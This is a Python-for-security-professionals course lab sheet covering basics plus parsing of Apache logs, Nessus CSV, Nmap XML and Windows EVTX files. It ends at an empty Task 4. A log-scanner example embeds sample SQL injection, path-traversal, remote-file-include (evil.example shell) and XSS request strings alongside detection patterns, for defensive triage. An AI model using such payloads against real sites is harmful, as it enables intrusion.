- Here is the Day 1 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_5_rec-lw-us-4_240269_recording.mp4
- Here is the Day 2 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_7_rec-hq-3_241310_recording.mp4
- Here is the Day 3 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_11_rec-lw-us-7_243144_recording.mp4
- Here is the Day 4 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_14_rec-hq-6_244377_recording.mp4
- Here is the Day 5 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_18_rec-hq-6_246395_recording.mp4
- Here is the Day 6 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_20_rec-hq-2_247633_recording.mp4
- #########################################
- # Here is the courseware for this month #
- #########################################
- Class powerpoint slides:
- https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx
- Courseware Lab Manual
- https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf
- https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
- username: strategicsec
- password: strategicsec
- The youtube video playlist that I'd like for you to watch is located here:
- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
- ##############################
- # Installing Python in Linux #
- ##############################
- The first thing that you will need to do is install IDLE.
- sudo apt-get install -y idle
- Open IDLE, and let's just dive right in.
- #############################
- # Lesson 1: Simple Printing #
- #############################
- >>> print "Today we are learning Python."
- #####################################
- # Lesson 2: Simple Numbers and Math #
- #####################################
- >>> 2+2
- >>> 6-3
- >>> 18/7
- >>> 18.0/7
- >>> 18.0/7.0
- >>> 18/7
- >>> 9%4
- >>> 8%4
- >>> 8.75%.5
- >>> 6.*7
- >>> 6*6*6
- >>> 6**3
- >>> 5**12
- >>> -5**4
- #######################
- # Lesson 3: Variables #
- #######################
- >>> x=18
- >>> x+15
- >>> x**3
- >>> y=54
- >>> x+y
- >>> g=input("Enter number here: ")
- 43
- >>> g+32
- >>> g**3
- ###################################
- # Lesson 4: Modules and Functions #
- ###################################
- >>> 5**4
- >>> pow(5,4)
- >>> abs(-18)
- >>> abs(5)
- >>> floor(18.7)
- >>> import math
- >>> math.floor(18.7)
- >>> math.sqrt(81)
- >>> joe = math.sqrt
- >>> joe(9)
- >>> joe=math.floor
- >>> joe(19.8)
- ##################################
- # Lesson 5: How to Save Programs #
- ##################################
- Run "IDLE (Python GUI)"
- File -> New Window
- print "Python for InfoSec"
- File -> Save as
- py4InfoSec.py
- Run -> Run Module or Press "F5"
- Create a file name.py
- x = raw_input("Enter name: ")
- print "Hey " + x
- raw_input("Press<enter>")
- Run -> Run Module or Press "F5"
- #####################
- # Lesson 6: Strings #
- #####################
- >>> "XSS"
- >>> 'SQLi'
- >>> "Joe's a python lover"
- >>> 'Joe\'s a python lover'
- >>> "Joe said \"InfoSec is fun\" to me"
- >>> a = "Joe"
- >>> b = "McCray"
- >>> a, b
- >>> a+b
- ##########################
- # Lesson 7: More Strings #
- ##########################
- >>> num = 10
- >>> num + 2
- >>> "The number of open ports found on this system is " + num
- >>> num = str(18)
- >>> "There are " + num + " vulnerabilities found in this environment."
- >>> num2 = 46
- >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
- #######################
- # Lesson 8: Raw Input #
- #######################
- Run "IDLE (Python GUI)"
- File -> New Window
- joemccray=input("Enter name: ")
- print joemccray
- Run -> Run Module # Will throw an error
- or
- Press "F5"
- File -> New Window
- joemccray=raw_input("Enter name: ")
- print joemccray
- Run -> Run Module # No error this time: raw_input() returns the name as a string
- or
- Press "F5"
- NOTE:
- Use input() for integers and expressions, and use raw_input() when you are dealing with strings.
- #################################
- # Lesson 9: Sequences and Lists #
- #################################
- >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
- >>> attacks
- ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
- >>> attacks[3]
- 'SQL Injection'
- >>> attacks[-2]
- 'Cross-Site Scripting'
- ###########################
- # Lesson 10: If Statement #
- ###########################
- Run "IDLE (Python GUI)"
- File -> New Window
- attack="SQLI"
- if attack=="SQLI":
-     print 'The attacker is using SQLI'
- Run -> Run Module or Press "F5"
- File -> New Window
- attack="XSS"
- if attack=="SQLI":
-     print 'The attacker is using SQLI'
- Run -> Run Module or Press "F5"
- #############################
- # Reference Videos To Watch #
- #############################
- Here is your first set of youtube videos that I'd like for you to watch:
- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
- ####################################
- # Lesson 11: Intro to Log Analysis #
- ####################################
- Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:
- https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
- username: strategicsec
- password: strategicsec
- Then execute the following commands:
- ---------------------------------------------------------------------------------------------------------
- wget https://s3.amazonaws.com/SecureNinja/Python/access_log
- cat access_log | grep 141.101.80.188
- cat access_log | grep 141.101.80.187
- cat access_log | grep 108.162.216.204
- cat access_log | grep 173.245.53.160
- ---------------------------------------------------------
- Google the following terms:
- - Python read file
- - Python read line
- - Python read from file
- ########################################################
- # Lesson 12: Use Python to read in a file line by line #
- ########################################################
- Reference:
- http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
- ---------------------------------------------------------
- vi logread1.py
- ## Open the file with read only permit
- f = open('access_log', "r")
- ## use readlines to read all lines in the file
- ## The variable "lines" is a list containing all lines
- lines = f.readlines()
- print lines
- ## close the file after reading the lines.
- f.close()
- ---------------------------------------------------------
- Google the following:
- - python difference between readlines and readline
- - python readlines and readline
- ################################
- # Lesson 13: A quick challenge #
- ################################
- Can you write an if/then statement that looks for this IP and prints "Found it"?
- 141.101.81.187
- ---------------------------------------------------------
- Hint 1: Use Python to look for a value in a list
- Reference:
- http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
- ---------------------------------------------------------
- Hint 2: Use Python to prompt for user input
- Reference:
- http://www.cyberciti.biz/faq/python-raw_input-examples/
- ---------------------------------------------------------
- Hint 3: Use Python to search for a string in a list
- Reference:
- http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
- Here is one student's solution - can you please explain this code to me?
- #!/usr/bin/python
- f = open('access_log')
- strUsrinput = raw_input("Enter IP Address: ")
- for line in iter(f):
-     # The client IP is the first field of an Apache log line; " - " separates it from the ident field
-     ip = line.split(" - ")[0]
-     if ip == strUsrinput:
-         print line
- f.close()
- -------------------------------
- Working with another student after class we came up with another solution:
- #!/usr/bin/env python
- # This line opens the log file
- f=open('access_log',"r")
- # This line takes each line in the log file and stores it as an element in the list
- lines = f.readlines()
- # This lines stores the IP that the user types as a var called userinput
- userinput = raw_input("Enter the IP you want to search for: ")
- # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
- for ip in lines:
-     if ip.find(userinput) != -1:
-         print ip
- #################################################
- # Lesson 14: Look for web attacks in a log file #
- #################################################
- In this lab we will look at the scan_log.py script, which scans an Apache server log for common attack attempts against your web server.
- Supported attacks:
- 1. SQL Injection
- 2. Local File Inclusion
- 3. Remote File Inclusion
- 4. Cross-Site Scripting
- wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py
- The usage for scan_log.py is simple. You feed it an apache log file.
- cat scan_log.py | less (use your up/down arrow keys to look through the file)
- Explain to me how this script works.
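- Added example (not the course's scan_log.py) covering Lesson 13 and Lesson 14 together: it parses Apache combined-format log lines, optionally keeps only one client IP, and flags the four attack classes scan_log.py reports. The log lines and the signature patterns are constructed for this example; real scanners use much larger rule sets. Written for Python 3.

```python
# Added example (not the course's scan_log.py): parse Apache combined-format
# access log lines, filter by client IP, and flag common web-attack patterns.
import re
from urllib.parse import unquote

# Apache "combined" log format; the IP is the first field, the request is quoted.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures for the four attack classes the course's scan_log.py covers.
# They are deliberately loose: this is log triage, not a WAF.
SIGNATURES = {
    "SQL Injection": re.compile(r"(union\s+select|'\s*or\s+\d+=\d+|sleep\(\d+\)|--\s*$)", re.I),
    "Local File Inclusion": re.compile(r"(\.\./){2,}|/etc/passwd|/proc/self/environ", re.I),
    "Remote File Inclusion": re.compile(r"[?&]\w+=(https?|ftp)://", re.I),
    "Cross-Site Scripting": re.compile(r"<\s*script|javascript:|onerror\s*=", re.I),
}

def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(path):
    """Return the attack classes whose signature matches the request path.
    The path is URL-decoded first so %27 / %3C style encoding does not hide it."""
    decoded = unquote(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan(lines, ip_filter=None):
    """Lesson 13 + 14 in one pass: keep lines from ip_filter (if given) and
    report (ip, path, [attack classes]) for every request that matches."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                      # unparseable line: skip, do not crash
        if ip_filter and rec["ip"] != ip_filter:
            continue
        kinds = classify(rec["path"])
        if kinds:
            hits.append((rec["ip"], rec["path"], kinds))
    return hits

# Constructed sample lines (not taken from the course's access_log).
SAMPLE_LOG = [
    '141.101.81.187 - - [10/May/2015:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '141.101.81.187 - - [10/May/2015:10:01:05 +0000] "GET /index.php?id=1%27%20OR%201=1-- HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/May/2015:10:02:00 +0000] "GET /page.php?file=../../../../etc/passwd HTTP/1.1" 404 210',
    '10.0.0.7 - - [10/May/2015:10:02:01 +0000] "GET /page.php?file=http://evil.example/shell.txt HTTP/1.1" 404 210',
    '10.0.0.9 - - [10/May/2015:10:03:00 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 99',
    'this line is garbage and will be skipped',
]

if __name__ == "__main__":
    for ip, path, kinds in scan(SAMPLE_LOG):
        print("%-15s %-25s %s" % (ip, ", ".join(kinds), path))
```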
- ################################
- # Lesson 15: Parsing CSV Files #
- ################################
- Dealing with csv files
- Reference:
- http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
- Type the following commands:
- ---------------------------------------------------------------------------------------------------------
- wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv
- Example 1 - Reading CSV files
- -----------------------------
- # To be able to read csv formatted files, we first have to import the
- # csv module.
- import csv
- with open('class_nessus.csv', 'rb') as f:
-     reader = csv.reader(f)
-     for row in reader:
-         print row
- Example 2 - Reading CSV files
- -----------------------------
- vi readcsv.py
- #!/usr/bin/python
- import csv # imports the csv module
- import sys # imports the sys module
- f = open(sys.argv[1], 'rb') # opens the csv file
- try:
-     reader = csv.reader(f) # creates the reader object
-     for row in reader: # iterates over the rows of the file in order
-         print row # prints each row
- finally:
-     f.close() # closing
- Example 3 - - Reading CSV files
- -------------------------------
- vi readcsv2.py
- #!/usr/bin/python
- # Read the CSV file and display its contents, one "header: value" pair per line.
- import csv
- ifile = open('class_nessus.csv', "rb")
- reader = csv.reader(ifile)
- rownum = 0
- for row in reader:
-     # Save header row.
-     if rownum == 0:
-         header = row
-     else:
-         colnum = 0
-         for col in row:
-             print '%-8s: %s' % (header[colnum], col)
-             colnum += 1
-     rownum += 1
- ifile.close()
- python readcsv2.py | less
- /---------------------------------------------------/
- --------------------PARSING CSV FILES----------------
- /---------------------------------------------------/
- -------------TASK 1------------
- vi readcsv3.py
- #!/usr/bin/python
- import csv
- f = open('class_nessus.csv', 'rb')
- try:
-     rownum = 0
-     reader = csv.reader(f)
-     for row in reader:
-         # Save header row.
-         if rownum == 0:
-             header = row
-         else:
-             # In a Nessus CSV export column 3 is Risk, 4 is Host, 5 is Protocol and 6 is Port
-             if row[3].lower() == 'high':
-                 print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
-         rownum += 1
- finally:
-     f.close()
- python readcsv3.py | less
- -------------TASK 2------------
- vi readcsv4.py
- #!/usr/bin/python
- import csv
- f = open('class_nessus.csv', 'rb')
- try:
-     print '/---------------------------------------------------/'
-     rownum = 0
-     hosts = {}
-     reader = csv.reader(f)
-     for row in reader:
-         # Save header row.
-         if rownum == 0:
-             header = row
-         else:
-             # Report each host only once: hosts{} remembers the hosts already printed
-             if row[3].lower() == 'high' and row[4] not in hosts:
-                 hosts[row[4]] = row[4]
-                 print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
-         rownum += 1
- finally:
-     f.close()
- python readcsv4.py | less
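- Added example (not the course's readcsv*.py): the same two tasks done with csv.DictReader, so columns are addressed by header name rather than by position, and generalised to a per-host, per-severity summary. The CSV text is constructed for this example in the layout of a Nessus export; it is not the class_nessus.csv file. Written for Python 3.

```python
# Added example (not the course's readcsv*.py): summarise a Nessus CSV export
# by host and severity using csv.DictReader instead of row[3], row[4], ...
import csv
import io
from collections import defaultdict

# Constructed sample in the layout of a Nessus CSV export (first columns are
# Plugin ID, CVE, CVSS, Risk, Host, Protocol, Port, Name). Not real scan data.
SAMPLE_CSV = """Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name
10001,,0.0,None,10.57.1.10,tcp,22,SSH Server Detection
10002,,10.0,Critical,10.57.1.10,tcp,445,Constructed SMB finding
10003,,7.5,High,10.57.1.10,tcp,80,Constructed web finding
10003,,7.5,High,10.57.1.11,tcp,80,Constructed web finding
10004,,5.0,Medium,10.57.1.11,tcp,443,Constructed TLS finding
10005,,7.2,high,10.57.1.12,udp,161,Constructed SNMP finding
"""

# Nessus risk ratings, most severe first.
SEVERITIES = ("Critical", "High", "Medium", "Low", "None")

def load_findings(text):
    """Parse CSV text into a list of dicts keyed by the header row.
    Risk is normalised to title case so 'high' and 'High' count the same."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["Risk"] = row["Risk"].strip().title()
        rows.append(row)
    return rows

def findings_at_or_above(rows, min_risk="High"):
    """Lesson 15 Task 1, generalised: rows whose Risk is min_risk or worse."""
    cutoff = SEVERITIES.index(min_risk)
    return [r for r in rows if r["Risk"] in SEVERITIES[:cutoff + 1]]

def hosts_by_severity(rows):
    """Lesson 15 Task 2, generalised: {host: {severity: count}} so each host
    appears once with a count per severity instead of one line per finding."""
    summary = defaultdict(lambda: defaultdict(int))
    for r in rows:
        summary[r["Host"]][r["Risk"]] += 1
    return {h: dict(c) for h, c in summary.items()}

def hosts_with_high_or_critical(rows):
    """The de-duplicated host list the course's readcsv4.py builds, sorted."""
    return sorted({r["Host"] for r in findings_at_or_above(rows, "High")})

if __name__ == "__main__":
    rows = load_findings(SAMPLE_CSV)
    for r in findings_at_or_above(rows):
        print("%-8s %-12s %s/%s %s" % (r["Risk"], r["Host"], r["Protocol"], r["Port"], r["Name"]))
    for host, counts in sorted(hosts_by_severity(rows).items()):
        print(host, counts)
```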
- ################################
- # Lesson 16: Parsing XML Files #
- ################################
- /---------------------------------------------------/
- --------------------PARSING XML FILES----------------
- /---------------------------------------------------/
- Type the following commands:
- ---------------------------------------------------------------------------------------------------------
- wget https://s3.amazonaws.com/SecureNinja/Python/samplescan.xml
- wget https://s3.amazonaws.com/SecureNinja/Python/application.xml
- wget https://s3.amazonaws.com/SecureNinja/Python/security.xml
- wget https://s3.amazonaws.com/SecureNinja/Python/system.xml
- wget https://s3.amazonaws.com/SecureNinja/Python/sc_xml.xml
- -------------TASK 1------------
- vi readxml1.py
- #!/usr/bin/python
- # Task 1: list the hosts whose OS fingerprint is Windows XP
- from xml.dom import minidom
- xmldoc = minidom.parse('sc_xml.xml')
- grandNode = xmldoc.documentElement   # the <nmaprun> root element
- nodes = grandNode.getElementsByTagName('host')
- for node in nodes:
-     os = node.getElementsByTagName('os')[0]
-     osclasses = os.getElementsByTagName('osclass')
-     for osclass in osclasses:
-         if osclass.attributes['osfamily'].value == 'Windows' and osclass.attributes['osgen'].value == 'XP':
-             try:
-                 print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value)
-             except:
-                 # This host has no <hostname> element
-                 print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value)
- -------------TASK 2------------
- vi readxml2.py
- #!/usr/bin/python
- # Task 2: list the hosts with SSH (tcp/22) open
- from xml.dom import minidom
- xmldoc = minidom.parse('sc_xml.xml')
- grandNode = xmldoc.documentElement
- nodes = grandNode.getElementsByTagName('host')
- for node in nodes:
-     portsNode = node.getElementsByTagName('ports')[0]
-     ports = portsNode.getElementsByTagName('port')
-     for port in ports:
-         if port.attributes['portid'].value == '22' and port.attributes['protocol'].value == 'tcp':
-             state = port.getElementsByTagName('state')[0]
-             if state.attributes['state'].value == 'open':
-                 try:
-                     print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : 22')
-                 except:
-                     print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : 22')
- -------------TASK 3------------
- vi readxml3.py
- #!/usr/bin/python
- # Task 3: list the hosts with a web port (tcp/80 or tcp/443) open
- from xml.dom import minidom
- xmldoc = minidom.parse('sc_xml.xml')
- grandNode = xmldoc.documentElement
- nodes = grandNode.getElementsByTagName('host')
- for node in nodes:
-     portsNode = node.getElementsByTagName('ports')[0]
-     ports = portsNode.getElementsByTagName('port')
-     flag = 0   # set once this host has been printed so it is not reported twice
-     for port in ports:
-         if flag == 0:
-             if port.attributes['protocol'].value == 'tcp' and (port.attributes['portid'].value == '443' or port.attributes['portid'].value == '80'):
-                 state = port.getElementsByTagName('state')[0]
-                 if state.attributes['state'].value == 'open':
-                     try:
-                         print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : '+port.attributes['portid'].value)
-                     except:
-                         print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : '+port.attributes['portid'].value)
-                     flag = 1
- -------------TASK 4------------
- vi readxml4.py
- #!/usr/bin/python
- # Task 4: hosts in 10.57.x.x with SSH open and a web port (tcp/80 or tcp/443) open
- from xml.dom import minidom
- xmldoc = minidom.parse('sc_xml.xml')
- grandNode = xmldoc.documentElement
- nodes = grandNode.getElementsByTagName('host')
- for node in nodes:
-     flag = 0
-     naddress = ''
-     addresses = node.getElementsByTagName('address')
-     for address in addresses:
-         if address.attributes['addrtype'].value == 'ipv4' and address.attributes['addr'].value[0:6] == '10.57.':
-             naddress = address.attributes['addr'].value
-             flag = 1
-     if flag == 1:
-         portsNode = node.getElementsByTagName('ports')[0]
-         ports = portsNode.getElementsByTagName('port')
-         flag = 0
-         status = {}   # remembers the SSH port/state until the web port is seen (must survive across ports)
-         for port in ports:
-             # Note: portid[0:2] == '22' also matches 220, 2222, ... not only port 22
-             if port.attributes['protocol'].value == 'tcp' and port.attributes['portid'].value[0:2] == '22':
-                 state = port.getElementsByTagName('state')[0]
-                 if "open" in state.attributes['state'].value:
-                     status[0] = state.attributes['state'].value
-                     status[1] = port.attributes['portid'].value
-                     flag = 1
-                 else:
-                     flag = 0
-             if port.attributes['protocol'].value == 'tcp' and flag == 1:
-                 if port.attributes['portid'].value == '80' or port.attributes['portid'].value == '443':
-                     state = port.getElementsByTagName('state')[0]
-                     if state.attributes['state'].value == 'open':
-                         flag = 0
-                         try:
-                             print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value)
-                         except:
-                             print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value)
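- Added example (not the course's readxml*.py): the four Lesson 16 tasks answered from one parsed host model built with xml.etree.ElementTree, which returns None for a missing element instead of raising IndexError the way getElementsByTagName(...)[0] does. The XML is constructed for this example using Nmap's element and attribute names; it is not sc_xml.xml. Written for Python 3.

```python
# Added example (not the course's readxml*.py): parse Nmap-style XML with
# ElementTree and answer the Lesson 16 questions from one host model.
import xml.etree.ElementTree as ET

# Constructed Nmap-style XML (not the course's sc_xml.xml). Element and
# attribute names follow nmap -oX output; hosts and values are made up.
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host>
    <address addr="10.57.1.10" addrtype="ipv4"/>
    <hostnames><hostname name="web01.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/></port>
      <port protocol="tcp" portid="80"><state state="open"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/></port>
    </ports>
    <os><osmatch name="Linux 3.x"><osclass osfamily="Linux" osgen="3.X"/></osmatch></os>
  </host>
  <host>
    <address addr="192.168.5.20" addrtype="ipv4"/>
    <hostnames/>
    <ports>
      <port protocol="tcp" portid="22"><state state="filtered"/></port>
      <port protocol="tcp" portid="443"><state state="open"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP3"><osclass osfamily="Windows" osgen="XP"/></osmatch></os>
  </host>
</nmaprun>
"""

def parse_hosts(xml_text):
    """Return a list of dicts {'ip','hostname','os','osclasses','ports'} where
    ports maps (protocol, portid) -> state. Missing elements become None/{}."""
    hosts = []
    for h in ET.fromstring(xml_text).iter("host"):
        ip = next((a.get("addr") for a in h.iter("address") if a.get("addrtype") == "ipv4"), None)
        hn = h.find("hostnames/hostname")
        osmatch = h.find("os/osmatch")
        hosts.append({
            "ip": ip,
            "hostname": hn.get("name") if hn is not None else None,
            "os": osmatch.get("name") if osmatch is not None else None,
            "osclasses": [(c.get("osfamily"), c.get("osgen")) for c in h.iter("osclass")],
            "ports": {(p.get("protocol"), p.get("portid")): p.find("state").get("state")
                      for p in h.iter("port")},
        })
    return hosts

def is_open(host, port, proto="tcp"):
    """True only when the state is exactly 'open' (not 'open|filtered')."""
    return host["ports"].get((proto, str(port))) == "open"

def windows_xp_hosts(hosts):
    """Task 1: hosts whose osclass says Windows / XP."""
    return [h for h in hosts if ("Windows", "XP") in h["osclasses"]]

def ssh_open_hosts(hosts):
    """Task 2: hosts with tcp/22 open."""
    return [h for h in hosts if is_open(h, 22)]

def web_open_hosts(hosts):
    """Task 3: hosts with tcp/80 or tcp/443 open."""
    return [h for h in hosts if is_open(h, 80) or is_open(h, 443)]

def ssh_and_web_in_prefix(hosts, prefix="10.57."):
    """Task 4: hosts in the prefix with tcp/22 open and a web port open.
    Compares the whole port number, so 220 or 2222 do not count as 22."""
    return [h for h in hosts
            if h["ip"] and h["ip"].startswith(prefix)
            and is_open(h, 22) and (is_open(h, 80) or is_open(h, 443))]

if __name__ == "__main__":
    hosts = parse_hosts(SAMPLE_XML)
    for h in ssh_and_web_in_prefix(hosts):
        print("%-8s: %s -> %-8s: %s" % ("Host", h["hostname"] or "Unable to find Hostname", "IP", h["ip"]))
```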
- ################################
- # Lesson 17: Parsing EVTX Logs #
- ################################
- /---------------------------------------------------/
- --------------------PARSING EVTX FILES----------------
- /---------------------------------------------------/
- Type the following commands:
- ---------------------------------------------------------------------------------------------------------
- wget https://s3.amazonaws.com/SecureNinja/Python/Program-Inventory.evtx
- wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Application.evtx
- wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Security.evtx
- wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_System.evtx
- -------------TASK 1------------
- vi readevtx1.py
- import mmap
- import re
- import contextlib
- import sys
- from xml.dom import minidom
- from Evtx.Evtx import FileHeader
- from Evtx.Views import evtx_file_xml_view
- file_name = str(raw_input('Enter EVTX file name without extension : '))
- # file_name = 'WIN-M751BADISCT_System'   # uncomment to hard-code the file while testing
- with open(file_name+'.evtx', 'r') as f:
-     with contextlib.closing(mmap.mmap(f.fileno(), 0,
-                                       access=mmap.ACCESS_READ)) as buf:
-         fh = FileHeader(buf, 0x0)
-         xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
-         try:
-             # Render every record to XML and collect them under one <Events> root
-             for xml, record in evtx_file_xml_view(fh):
-                 xml_file += xml
-         except:
-             pass
-         xml_file += "</Events>"
- # Close the unpaired tags and escape bare ampersands so minidom can parse the result
- xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
- xml_file = re.sub('<local>', '<local></local>', xml_file)
- xml_file = re.sub(r'&(?![A-Za-z#][A-Za-z0-9]*;)', '&amp;', xml_file)
- f = open(file_name+'.xml', 'w')
- f.write(xml_file)
- f.close()
- try:
-     xmldoc = minidom.parse(file_name+'.xml')
- except:
-     sys.exit('Invalid file...')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('Event')
- event_num = int(raw_input('How many events you want to show : '))
- length = int(len(nodes)) - 1
- event_id = 0
- if event_num > length:
-     sys.exit('You have entered an invalid num...')
- # Walk the records from the last (newest) to the first until event_num have been printed
- while True:
-     if event_num > 0 and length > -1:
-         try:
-             node = nodes[length]
-             event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
-             try:
-                 print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue)
-             except:
-                 print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found')
-             event_num -= 1
-             length -= 1
-         except:
-             length -= 1
-     else:
-         sys.exit('...Search Complete...')
- -------------TASK 2------------
- vi readevtx2.py
- import mmap
- import re
- import contextlib
- import sys
- from xml.dom import minidom
- from Evtx.Evtx import FileHeader
- from Evtx.Views import evtx_file_xml_view
- file_name = str(raw_input('Enter EVTX file name without extension : '))
- # file_name = 'WIN-M751BADISCT_System'   # uncomment to hard-code the file while testing
- with open(file_name+'.evtx', 'r') as f:
-     with contextlib.closing(mmap.mmap(f.fileno(), 0,
-                                       access=mmap.ACCESS_READ)) as buf:
-         fh = FileHeader(buf, 0x0)
-         xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
-         try:
-             for xml, record in evtx_file_xml_view(fh):
-                 xml_file += xml
-         except:
-             pass
-         xml_file += "</Events>"
- # Close the unpaired tags and escape bare ampersands so minidom can parse the result
- xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
- xml_file = re.sub('<local>', '<local></local>', xml_file)
- xml_file = re.sub(r'&(?![A-Za-z#][A-Za-z0-9]*;)', '&amp;', xml_file)
- f = open(file_name+'.xml', 'w')
- f.write(xml_file)
- f.close()
- try:
-     xmldoc = minidom.parse(file_name+'.xml')
- except:
-     sys.exit('Invalid file...')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('Event')
- event = int(raw_input('Enter Event ID : '))
- event_id = 0
- # Print every record whose EventID matches the one the user asked for
- for node in nodes:
-     try:
-         event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
-         if int(event_id) == event:
-             try:
-                 print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue)
-             except:
-                 print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found')
-     except:
-         continue
- sys.exit('...Search Complete...')
- -------------TASK 3------------
- vi readevtx3.py
- import mmap
- import re
- import contextlib
- import sys
- from xml.dom import minidom
- from Evtx.Evtx import FileHeader
- from Evtx.Views import evtx_file_xml_view
- file_name = str(raw_input('Enter EVTX file name without extension : '))
- # file_name = 'WIN-M751BADISCT_System'   # uncomment to hard-code the file while testing
- with open(file_name+'.evtx', 'r') as f:
-     with contextlib.closing(mmap.mmap(f.fileno(), 0,
-                                       access=mmap.ACCESS_READ)) as buf:
-         fh = FileHeader(buf, 0x0)
-         xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
-         try:
-             for xml, record in evtx_file_xml_view(fh):
-                 xml_file += xml
-         except:
-             pass
-         xml_file += "</Events>"
- # Close the unpaired tags and escape bare ampersands so minidom can parse the result
- xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
- xml_file = re.sub('<local>', '<local></local>', xml_file)
- xml_file = re.sub(r'&(?![A-Za-z#][A-Za-z0-9]*;)', '&amp;', xml_file)
- f = open(file_name+'.xml', 'w')
- f.write(xml_file)
- f.close()
- try:
-     xmldoc = minidom.parse(file_name+'.xml')
- except:
-     sys.exit('Invalid file...')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('Event')
- event = int(raw_input('Enter Event ID : '))
- event_id = 0
- event_count = 0
- # Count how many records carry the requested EventID
- for node in nodes:
-     try:
-         event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
-         if int(event_id) == event:
-             event_count += 1
-     except:
-         continue
- print '%-8s: %s - %-8s: %s' % ('Event ID',event,'Count',event_count)
- sys.exit('...Search Complete...')
- -------------TASK 4------------
